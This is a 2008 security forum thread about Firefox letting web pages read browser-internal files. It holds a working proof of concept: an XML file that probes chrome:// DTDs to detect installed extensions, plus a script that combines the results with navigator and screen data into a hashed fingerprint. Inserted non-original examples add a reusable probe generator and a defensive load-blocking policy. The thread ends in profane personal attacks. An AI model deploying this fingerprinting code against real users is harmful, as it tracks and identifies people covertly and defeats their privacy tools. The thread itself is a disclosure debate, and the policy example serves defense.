Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Firefox Vulnerable By Default
Posted by: Gareth Heyes
Date: February 11, 2008 08:27AM

No matter what Mozilla say...

http://www.0x000000.com/index.php?i=515

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 06:50AM

Heh, but Mozilla is right - you are only reading out files that are the same for every Firefox browser on the planet. You can just as well get them from FTP. And - no, you cannot read .manifest files like this (not that they would contain anything "useful").

Edit: This does not mean that allowing everything in the application directory to be accessed from a web page is nice; after all, file:/// URLs are forbidden for a reason (still not in Internet Explorer, I think). And from what I understand this will be fixed in Firefox 3: you will only be able to access the res/ subdirectory, which is explicitly meant to be usable from the web.



Edited 1 time(s). Last edit at 02/15/2008 06:57AM by trev.

Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 07:16AM

That is not true. If you change a browser preference like your user agent, we can read out the original file in greprefs and still know which browser you use, so it's not possible to anonymize yourself, since I can read out which browser you use through greprefs/all.js or firefox.js or any other 'standard' file :)

.manifest files CAN be accessed: if someone installed an XPI from somewhere other than Mozilla, it tends to install itself in that folder. I tried it out with XUL maker and it can have access to it.


hehe for all you Firefox fanboys:

xml file (total_recall.xml):

<!DOCTYPE body [
  <!-- Each block pulls in a chrome:// DTD through an external parameter
       entity and then declares a fallback for one entity that DTD defines.
       XML binds the FIRST declaration of an entity name, so the fallback
       "null" only takes effect when the chrome:// DTD could not be loaded,
       i.e. the extension is not installed. -->
  <!ENTITY % brandDTD SYSTEM "chrome://branding/locale/brand.dtd">
  %brandDTD;
  <!ENTITY brandShortName "null">

  <!ENTITY % noscriptDTD SYSTEM "chrome://noscript/locale/noscript.dtd">
  %noscriptDTD;
  <!ENTITY noscriptPlugins "null">

  <!ENTITY % creditsDTD SYSTEM "chrome://browser/locale/credits.dtd">
  %creditsDTD;
  <!ENTITY brandMotto "null">

  <!ENTITY % cs_settingsDTD SYSTEM "chrome://cachestatus/locale/cs_settings.dtd">
  %cs_settingsDTD;
  <!ENTITY presence.label "null">

  <!ENTITY % ChromeListOverlayDTD SYSTEM "chrome://chromelist/locale/ChromeListOverlay.dtd">
  %ChromeListOverlayDTD;
  <!ENTITY chromelist.menu "null">

  <!ENTITY % downbartextDTD SYSTEM "chrome://downbar/locale/downbartext.dtd">
  %downbartextDTD;
  <!ENTITY pTitle.label "null">

  <!ENTITY % pref-fasterfoxDTD SYSTEM "chrome://fasterfox/locale/pref-fasterfox.dtd">
  %pref-fasterfoxDTD;
  <!ENTITY prefetching.tab "null">

  <!ENTITY % firebugDTD SYSTEM "chrome://firebug/locale/firebug.dtd">
  %firebugDTD;
  <!ENTITY firebug.Firebug "null">

  <!ENTITY % foxyproxyDTD SYSTEM "chrome://foxyproxy/locale/foxyproxy.dtd">
  %foxyproxyDTD;
  <!ENTITY foxyproxy.label "null">

  <!ENTITY % ocspDTD SYSTEM "chrome://mozapps/locale/preferences/ocsp.dtd">
  %ocspDTD;
  <!ENTITY certOCSP.label "null">

  <!ENTITY % aboutDTD SYSTEM "chrome://reporter/locale/about.dtd">
  %aboutDTD;
  <!ENTITY thanks.text "null">

  <!ENTITY % tamperdataDTD SYSTEM "chrome://tamperdata/locale/tamperdata.dtd">
  %tamperdataDTD;
  <!ENTITY tamperdata.toolbar.startTamper "null">

  <!ENTITY % entitiesDTD SYSTEM "chrome://trashmail/locale/entities.dtd">
  %entitiesDTD;
  <!ENTITY trashmail.title "null">

  <!ENTITY % useragentswitcherDTD SYSTEM "chrome://useragentswitcher/locale/useragentswitcher.dtd">
  %useragentswitcherDTD;
  <!ENTITY useragentswitcher.name "null">

  <!-- Parameter entity renamed from aboutDTD: that name is already used for
       reporter's about.dtd above, and a second declaration of the same
       parameter entity is ignored, so this DTD would never be fetched. -->
  <!ENTITY % sdAboutDTD SYSTEM "chrome://simpledelicious/locale/about.dtd">
  %sdAboutDTD;
  <!ENTITY extName.label "null">

  <!-- The probes below are declared but not read by the body. -->
  <!ENTITY % autosavetexttocookieDTD SYSTEM "chrome://autosavetexttocookie/locale/autosavetexttocookie.dtd">
  %autosavetexttocookieDTD;
  <!ENTITY autosavetexttocookie.label "null">

  <!ENTITY % ieviewOverlayDTD SYSTEM "chrome://safariview/locale/ieviewOverlay.dtd">
  %ieviewOverlayDTD;
  <!ENTITY toolbarbutton.label "null">

  <!ENTITY % igsidebarDTD SYSTEM "chrome://igsidebar/locale/igsidebar.dtd">
  %igsidebarDTD;
  <!ENTITY igsidebar.title "null">

  <!ENTITY % keyscramblerDTD SYSTEM "chrome://keyscrambler/locale/keyscrambler.dtd">
  %keyscramblerDTD;
  <!ENTITY keyscrambler.label "null">

  <!ENTITY % overlayDTD SYSTEM "chrome://firephish/locale/overlay.dtd">
  %overlayDTD;
  <!ENTITY firephish "null">

  <!ENTITY % quickrestartDTD SYSTEM "chrome://quickrestart/locale/quickrestart.dtd">
  %quickrestartDTD;
  <!ENTITY menu.tools.item.restart "null">

  <!ENTITY % simplemailDTD SYSTEM "chrome://simplemail/locale/simplemail.dtd">
  %simplemailDTD;
  <!ENTITY sendBySimpleMail "null">

  <!ENTITY % sqlitemanagerDTD SYSTEM "chrome://sqlitemanager/locale/sqlitemanager.dtd">
  %sqlitemanagerDTD;
  <!ENTITY window.title "null">

  <!ENTITY % passhash-optionsDTD SYSTEM "chrome://passwordhasher/locale/passhash-options.dtd">
  %passhash-optionsDTD;
  <!ENTITY pshOpt.title "null">
]>

<!-- Each element expands to the localized label from the extension's DTD,
     or to "null" when that chrome:// DTD did not resolve. -->
<body>
  <x1>&brandShortName;</x1>
  <x2>&brandMotto;</x2>
  <x3>&noscriptPlugins;</x3>
  <x4>&presence.label;</x4>
  <x5>&chromelist.menu;</x5>
  <x6>&pTitle.label;</x6>
  <x7>&prefetching.tab;</x7>
  <x8>&firebug.Firebug;</x8>
  <x9>&foxyproxy.label;</x9>
  <x10>&certOCSP.label;</x10>
  <x11>&thanks.text;</x11>
  <x12>&tamperdata.toolbar.startTamper;</x12>
  <x13>&trashmail.title;</x13>
  <x14>&useragentswitcher.name;</x14>
  <x15>&extName.label;</x15>
</body>

html file:

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>TOTAL RECALL</title>
<script>
    // Load total_recall.xml synchronously (old Gecko XMLDocument.load API)
    // and collect the values the DTD probes resolved to. Anything other
    // than "null" means the corresponding chrome:// DTD was found.
    var tapped = '';
    var call_xml = document.implementation.createDocument('', '', null);
    call_xml.async = false;
    call_xml.load("total_recall.xml");

    // Read x1 .. x15 (the original loop stopped at x14 and missed x15).
    for (var i = 1; i <= 15; ++i) {
        tapped += call_xml.getElementsByTagName("x" + i)[0].childNodes[0].nodeValue + '|';
    }

    // Classic navigator/screen fingerprint. Several of these properties
    // (appMinorVersion, bufferDepth, cpuClass, browserLanguage,
    // systemLanguage, userLanguage, userProfile) are IE-only and simply
    // read back as "undefined" in Firefox.
    function recon() {
        var globals = '';
        globals += this.navigator.javaEnabled() + '|';
        globals += this.navigator.taintEnabled() + '|';
        globals += this.navigator.userAgent + '|';
        globals += this.navigator.appMinorVersion + '|';
        globals += this.navigator.appVersion + '|';
        globals += this.navigator.appName + '|';
        globals += this.screen.width + '|';
        globals += this.screen.height + '|';
        globals += this.screen.availWidth + '|';
        globals += this.screen.availHeight + '|';
        globals += this.screen.colorDepth + '|';
        globals += this.screen.pixelDepth + '|';
        globals += this.screen.bufferDepth + '|';
        globals += this.navigator.mimeTypes.length + '|';
        globals += this.navigator.platform + '|';
        globals += this.navigator.cpuClass + '|';
        globals += this.navigator.language + '|';
        globals += this.navigator.browserLanguage + '|';
        globals += this.navigator.systemLanguage + '|';
        globals += this.navigator.userLanguage + '|';
        globals += this.navigator.cookieEnabled + '|';
        globals += this.navigator.userProfile + '|';
        return globals;
    }
    var rr = recon();

    // Hash the extension probe results together with the navigator data
    // into one fingerprint, then dump both lists into the page.
    function total_recall_firefox() {
        alert('Computed hashsum: ' + x_recall(rr + tapped));
        document.write(tapped.replace(/\|/gim, '<br />'));
        document.write(rr.replace(/\|/gim, '<br />'));
    }

    // MD5: the usual JavaScript implementation (Paul Johnston's md5.js) with
    // renamed helpers. recall_md5 is the core compression loop over 512-bit
    // blocks, padd adds two 32-bit words without overflow, bit_rol rotates,
    // bscall_xml turns a string into a little-endian word array and bhex
    // turns the word array into a hex string.
    function recall_md5(x, len) {
        // Append the 0x80 padding byte and the message length in bits.
        x[len >> 5] |= 0x80 << ((len) % 32);
        x[(((len + 64) >>> 9) << 4) + 14] = len;
        var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878;
        for (var i = 0; i < x.length; i += 16) {
            var olda = a; var oldb = b; var oldc = c; var oldd = d;
            a=x_ff(a,b,c,d,x[i+ 0],7 ,-680876936);  d=x_ff(d,a,b,c,x[i+ 1],12,-389564586);
            c=x_ff(c,d,a,b,x[i+ 2],17, 606105819);  b=x_ff(b,c,d,a,x[i+ 3],22,-1044525330);
            a=x_ff(a,b,c,d,x[i+ 4],7 ,-176418897);  d=x_ff(d,a,b,c,x[i+ 5],12, 1200080426);
            c=x_ff(c,d,a,b,x[i+ 6],17,-1473231341); b=x_ff(b,c,d,a,x[i+ 7],22,-45705983);
            a=x_ff(a,b,c,d,x[i+ 8],7 , 1770035416); d=x_ff(d,a,b,c,x[i+ 9],12,-1958414417);
            c=x_ff(c,d,a,b,x[i+10],17,-42063);      b=x_ff(b,c,d,a,x[i+11],22,-1990404162);
            a=x_ff(a,b,c,d,x[i+12],7 , 1804603682); d=x_ff(d,a,b,c,x[i+13],12,-40341101);
            c=x_ff(c,d,a,b,x[i+14],17,-1502002290); b=x_ff(b,c,d,a,x[i+15],22, 1236535329);
            a=x_gg(a,b,c,d,x[i+ 1],5 ,-165796510);  d=x_gg(d,a,b,c,x[i+ 6],9 ,-1069501632);
            c=x_gg(c,d,a,b,x[i+11],14, 643717713);  b=x_gg(b,c,d,a,x[i+ 0],20,-373897302);
            a=x_gg(a,b,c,d,x[i+ 5],5 ,-701558691);  d=x_gg(d,a,b,c,x[i+10],9 , 38016083);
            c=x_gg(c,d,a,b,x[i+15],14,-660478335);  b=x_gg(b,c,d,a,x[i+ 4],20,-405537848);
            a=x_gg(a,b,c,d,x[i+ 9],5 , 568446438);  d=x_gg(d,a,b,c,x[i+14],9 ,-1019803690);
            c=x_gg(c,d,a,b,x[i+ 3],14,-187363961);  b=x_gg(b,c,d,a,x[i+ 8],20, 1163531501);
            a=x_gg(a,b,c,d,x[i+13],5 ,-1444681467); d=x_gg(d,a,b,c,x[i+ 2],9 ,-51403784);
            c=x_gg(c,d,a,b,x[i+ 7],14, 1735328473); b=x_gg(b,c,d,a,x[i+12],20,-1926607734);
            a=x_hh(a,b,c,d,x[i+ 5],4 ,-378558);     d=x_hh(d,a,b,c,x[i+ 8],11,-2022574463);
            c=x_hh(c,d,a,b,x[i+11],16, 1839030562); b=x_hh(b,c,d,a,x[i+14],23,-35309556);
            a=x_hh(a,b,c,d,x[i+ 1],4 ,-1530992060); d=x_hh(d,a,b,c,x[i+ 4],11, 1272893353);
            c=x_hh(c,d,a,b,x[i+ 7],16,-155497632);  b=x_hh(b,c,d,a,x[i+10],23,-1094730640);
            a=x_hh(a,b,c,d,x[i+13],4 , 681279174);  d=x_hh(d,a,b,c,x[i+ 0],11,-358537222);
            c=x_hh(c,d,a,b,x[i+ 3],16,-722521979);  b=x_hh(b,c,d,a,x[i+ 6],23, 76029189);
            a=x_hh(a,b,c,d,x[i+ 9],4 ,-640364487);  d=x_hh(d,a,b,c,x[i+12],11,-421815835);
            c=x_hh(c,d,a,b,x[i+15],16, 530742520);  b=x_hh(b,c,d,a,x[i+ 2],23,-995338651);
            a=x_ii(a,b,c,d,x[i+ 0],6 ,-198630844);  d=x_ii(d,a,b,c,x[i+ 7],10, 1126891415);
            c=x_ii(c,d,a,b,x[i+14],15,-1416354905); b=x_ii(b,c,d,a,x[i+ 5],21,-57434055);
            a=x_ii(a,b,c,d,x[i+12],6 , 1700485571); d=x_ii(d,a,b,c,x[i+ 3],10,-1894986606);
            c=x_ii(c,d,a,b,x[i+10],15,-1051523);    b=x_ii(b,c,d,a,x[i+ 1],21,-2054922799);
            a=x_ii(a,b,c,d,x[i+ 8],6 , 1873313359); d=x_ii(d,a,b,c,x[i+15],10,-30611744);
            c=x_ii(c,d,a,b,x[i+ 6],15,-1560198380); b=x_ii(b,c,d,a,x[i+13],21, 1309151649);
            a=x_ii(a,b,c,d,x[i+ 4],6 ,-145523070);  d=x_ii(d,a,b,c,x[i+11],10,-1120210379);
            c=x_ii(c,d,a,b,x[i+ 2],15, 718787259);  b=x_ii(b,c,d,a,x[i+ 9],21,-343485551);
            a = padd(a, olda);
            b = padd(b, oldb);
            c = padd(c, oldc);
            d = padd(d, oldd);
        }
        return Array(a, b, c, d);
    }

    // The four MD5 round functions share one step: rotate-add with the
    // per-step constant t and shift s.
    function x_cmn(q,a,b,x,s,t)  { return padd(bit_rol(padd(padd(a,q),padd(x,t)),s),b); }
    function x_ff(a,b,c,d,x,s,t) { return x_cmn((b & c)|((~b) & d),a,b,x,s,t); }
    function x_gg(a,b,c,d,x,s,t) { return x_cmn((b & d)|(c & (~d)),a,b,x,s,t); }
    function x_hh(a,b,c,d,x,s,t) { return x_cmn(b^c^d,a,b,x,s,t); }
    function x_ii(a,b,c,d,x,s,t) { return x_cmn(c^(b|(~d)),a,b,x,s,t); }
    function bit_rol(num,cnt){ return (num<<cnt)|(num >>> (32 - cnt)); }

    // Word array -> lowercase hex, least significant byte first.
    function bhex(binarray){
      var hex_tab="0123456789abcdef"; var scall_xml="";
      for(var i=0; i < binarray.length * 4; i++){
        scall_xml += hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4)) & 0xF) +
                     hex_tab.charAt((binarray[i>>2]>>((i%4)*8  )) & 0xF);
      }
      return scall_xml;
    }

    // String -> little-endian word array, 8 bits per character.
    function bscall_xml(scall_xml){
      var bin=Array(); var mask=(1<<8) - 1;
      for(var i=0; i < scall_xml.length * 8; i += 8)
        bin[i>>5] |= (scall_xml.charCodeAt(i / 8) & mask)<<(i%32);
      return bin;
    }

    // 32-bit addition that does not lose precision to JS doubles.
    function padd(x,y){
      var lsw=(x & 0xFFFF)+(y & 0xFFFF); var msw=(x>>16)+(y>>16)+(lsw>>16);
      return (msw<<16)|(lsw & 0xFFFF);
    }

    function x_recall(s){ return bhex(recall_md5(bscall_xml(s),s.length * 8));}
</script>
</head>
<body>
    <script>total_recall_firefox();</script>
</body>
</html>



Edited 1 time(s). Last edit at 02/15/2008 07:26AM by Ronald.

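The probe document in the post above, generalized, as an added example that is not part of the original post: it generates the same kind of chrome:// DTD probe XML from a table of targets and decodes the values the loading page reads back into a list of installed extensions. The DTD URLs and entity names come from the post; `buildProbeXml`, `decodeProbe`, `detectedExtensions`, the "null" sentinel and the sample values are this example's own assumptions, and it runs under Node rather than in the browser (the generated file is served and loaded exactly as the post's HTML loads total_recall.xml).

```javascript
// Added example, not code from the thread: build a chrome:// DTD probe
// document from a table of targets and decode what comes back.

const SENTINEL = 'null';

// One row per target: a chrome:// DTD that only resolves when the extension
// is installed, and one entity name that DTD is known to declare. URLs and
// entity names are taken from the post above.
const PROBES = [
  { id: 'branding',  dtd: 'chrome://branding/locale/brand.dtd',      entity: 'brandShortName' },
  { id: 'noscript',  dtd: 'chrome://noscript/locale/noscript.dtd',   entity: 'noscriptPlugins' },
  { id: 'firebug',   dtd: 'chrome://firebug/locale/firebug.dtd',     entity: 'firebug.Firebug' },
  { id: 'foxyproxy', dtd: 'chrome://foxyproxy/locale/foxyproxy.dtd', entity: 'foxyproxy.label' },
];

// Emits the probe XML. Every target gets a uniquely named parameter entity
// (the post's XML declares aboutDTD twice, and XML ignores the second
// declaration of a name, so that second DTD is never fetched), expands it,
// and only THEN declares a fallback. XML binds the first declaration of an
// entity, so the fallback is used only when the chrome:// DTD failed to load.
function buildProbeXml(probes) {
  let subset = '';
  let body = '';
  probes.forEach((p, i) => {
    const pe = 'probe' + i;
    subset += '  <!ENTITY % ' + pe + ' SYSTEM "' + p.dtd + '">\n';
    subset += '  %' + pe + ';\n';
    subset += '  <!ENTITY ' + p.entity + ' "' + SENTINEL + '">\n';
    body += '  <x' + i + '>&' + p.entity + ';</x' + i + '>\n';
  });
  return '<!DOCTYPE body [\n' + subset + ']>\n<body>\n' + body + '</body>\n';
}

// values[i] is the text content of <x{i}> as the loading page read it.
// Anything other than the sentinel means the DTD resolved, i.e. the
// extension is present; the value itself is normally a localized label.
function decodeProbe(probes, values) {
  return probes.map((p, i) => ({
    id: p.id,
    present: typeof values[i] === 'string' && values[i] !== SENTINEL,
    value: values[i] === undefined ? null : values[i],
  }));
}

function detectedExtensions(probes, values) {
  return decodeProbe(probes, values).filter(r => r.present).map(r => r.id);
}

// Constructed sample: what a profile with Firebug but without NoScript or
// FoxyProxy would hand back (the label strings are made up).
const SAMPLE_VALUES = ['Firefox', 'null', 'Firebug', 'null'];

console.log(buildProbeXml(PROBES));
console.log(detectedExtensions(PROBES, SAMPLE_VALUES)); // ['branding', 'firebug']
```

Only a Firefox that still lets web content pull in chrome:// DTDs (the behaviour trev's bug reference below is about) fills in anything other than the sentinel; on a browser that blocks the load every element reads "null" and the decoder reports nothing installed, which is the correct negative result rather than an error.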
Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 09:51AM

Quote

That is not true, if you change your browser preference like your user agent, we can read out the original file in the greprefs and still know what browser you use
So what? There are literally thousands of ways to recognize a particular browser. Changing the user agent is for those stupid sites that look for "MSIE" there; otherwise it doesn't give you anything.

Quote

.manifest files CAN be accessed if someone installed an xpi other than from mozilla it tends to installs itself in that folder
No Firefox extension installs itself in the application directory. What you dig out there is an ancient (2004) extension meant for the Mozilla suite. And even then - you still didn't show how you want to read a .manifest file from a web page.

Quote

hehe for all you Firefox fanboys:
Fanboys? How about common sense?

Let's not mix apples and oranges here. The XML file you so proudly present is a well-known issue (bug 292789). Random access to chrome:// should not be allowed, we all know this (and some of us even have their workarounds in place). But we are talking about resource: URLs here, right?

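The kind of workaround trev alludes to, as an added example that is neither his code nor Mozilla's: a scheme-based load policy that a browser or extension could apply to every subresource a web document requests (DTDs, scripts, images, XHR) so that http/https content cannot reach chrome://, resource://, file:// or jar: URLs. `shouldLoad`, `schemeOf`, the scheme lists and the res/-only rule for resource: are assumptions of this example; the res/ rule models trev's description of what Firefox 3 would allow and is not a statement of what any Firefox version actually shipped.

```javascript
// Added example, not code from the thread or from Mozilla: a load policy
// that keeps web content away from privileged URL schemes.

const WEB_SCHEMES = new Set(['http', 'https', 'ftp']);
const PRIVILEGED_SCHEMES = new Set(['chrome', 'resource', 'file', 'jar', 'about']);

// Scheme per RFC 3986; null for relative or malformed URLs. A plain regex
// is used on purpose: nested schemes such as jar:file:///... must still be
// recognised by their outer scheme.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(String(url).trim());
  return m ? m[1].toLowerCase() : null;
}

// Assumption: resource:///res/... and resource://gre/res/... are the public
// part of the application directory. Dot segments and percent-encoded dots
// are rejected so that res/../greprefs/all.js cannot escape the allowed tree.
function isPublicResourceUrl(url) {
  if (!/^resource:\/\/(gre)?\/res\//i.test(url)) return false;
  if (/\.\.|%2e/i.test(url)) return false;
  return true;
}

// Decide whether a document at originUrl may load requestUrl.
function shouldLoad(originUrl, requestUrl) {
  const origin = schemeOf(originUrl);
  const target = schemeOf(requestUrl);
  if (origin === null || target === null) {
    return { allow: false, reason: 'unparseable URL' };
  }
  // A privileged document (the browser UI itself) may load anything.
  if (!WEB_SCHEMES.has(origin)) {
    return { allow: true, reason: 'privileged origin' };
  }
  if (target === 'resource' && isPublicResourceUrl(requestUrl)) {
    return { allow: true, reason: 'resource URL under res/' };
  }
  if (PRIVILEGED_SCHEMES.has(target)) {
    return { allow: false, reason: 'web content may not load ' + target + ': URLs' };
  }
  return { allow: true, reason: 'ordinary web load' };
}

// Constructed sample: the loads the probe page in this thread would trigger,
// plus a few control cases.
const SAMPLE_ORIGIN = 'http://attacker.example/total_recall.xml';
const SAMPLE_REQUESTS = [
  'chrome://noscript/locale/noscript.dtd',
  'resource:///greprefs/all.js',
  'resource:///res/html.css',
  'resource://gre/res/../greprefs/all.js',
  'jar:file:///opt/firefox/chrome/browser.jar!/locale/x.dtd',
  'https://cdn.example/lib.js',
];

function auditSample() {
  return SAMPLE_REQUESTS.map(u => ({ url: u, allow: shouldLoad(SAMPLE_ORIGIN, u).allow }));
}

console.table(auditSample());
```

The decision is made on the outermost scheme before any path parsing, which is why a jar: wrapper around a file: URL is caught without unwrapping it; the path check only runs for the single scheme (resource:) that has a deliberately public subtree.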
Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 10:16AM

Yeah, so what? A bit mad that I attack your favorite little buggy browser, and downplay it because of it? I don't care about your comments.

I do know a way to get the files; I told you about it. I've got 2 file upload vulns. So narrow-minded. All of a sudden it isn't a problem but a feature.

Ah well, this year I devoted to Mozilla; another out-of-memory heap exploit is coming their way soon. Suck on that one and screw Mozilla.

You seem to know better, and thats fine I told you.

Ah fuck, it's better than re-hashing the same XSS shit for 2 years!

Re: Firefox Vulnerable By Default
Posted by: trev
Date: February 15, 2008 10:53AM

Don't worry, I won't comment again on the "security vulnerabilities" you find.

Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 11:03AM

Screw you.

What do you have to bring to the table eh?

I just write about the stuff I find for my pleasure; I don't even post them on Bugzilla to claim my $500 for the vulnerabilities I found, like others do. How's that for showing off?

I won't talk at those stupid meetings where only vendors try to shelf their insecure software, I don't talk at black-n00b-hat or other silly meetings to "show off"

I never asked to get /.'tted.

In fact I want everyone to fuck off from my blog and leave me alone.

BTW, the latest Firefox got an update due to one of my exploits, and they never credited me correctly. See, I don't care to claim it. Still, you upgrade to the newest Firefox and piss me off; well, that's fine and it tells enough.

Now that is showing off! because I don't care.



Edited 1 time(s). Last edit at 02/15/2008 11:08AM by Ronald.

Re: Firefox Vulnerable By Default
Posted by: Anonymous User
Date: February 15, 2008 07:58PM

And that's the last thing I say on this forum, because you make me fucking sick. You know I'm tired of this bullshit, This is my last message ever, I will never post on this board again. Fin.
